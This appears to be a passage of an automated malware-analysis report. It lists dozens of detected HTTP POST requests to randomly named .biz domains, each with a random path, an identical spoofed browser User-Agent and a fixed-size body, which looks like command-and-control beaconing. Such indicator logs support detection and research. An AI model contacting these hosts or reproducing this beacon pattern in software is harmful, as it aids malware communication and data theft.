Source: global traffic	HTTP traffic detected: POST /vbgexw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /flarmrvjgo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /iatkorfmnwf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cmvqnkktnlmsiyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vkwyeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /tflprvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ybbogla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cgoaec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vatx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cuqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kiywguufjdpqtpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ehquov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vppkcegilvgf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fkax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gqqjufjjpxhxqwb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /obdt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pirbxlgko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /uvrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xvbdrvgarw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rxnqqlqsl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wxnfkxfh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cjwsbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qcbsfnonovikje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lrywafs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hbcdkqyacacfvqqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hnpfnrirpigau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /goxnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xce HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xmoomdas HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qmcamdw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /akpcxuoptmorf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /armgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vdcxryneefpufnys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sskdftgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gbgqeacfgvpvmc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jwmuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ppwjrkubwfxcghyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qppgqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rydwrcfdefifnid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qeqkpadihkhxvp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wdbsliqsvat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lmgofko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /agrlsditgvrhbmam HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dckvav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qqngegncolupvk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bioujqhkngbec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /eicbtm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lglryrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jjeefsoqcwkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xebufengtanjkobx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qsjvwblhtwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rewibl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /up HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gpwbguwoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rcdfrlm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /iikfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wveptxshemmsp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vdhidkscvohylymj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dvvwndpvxviw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /idodhoekyfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
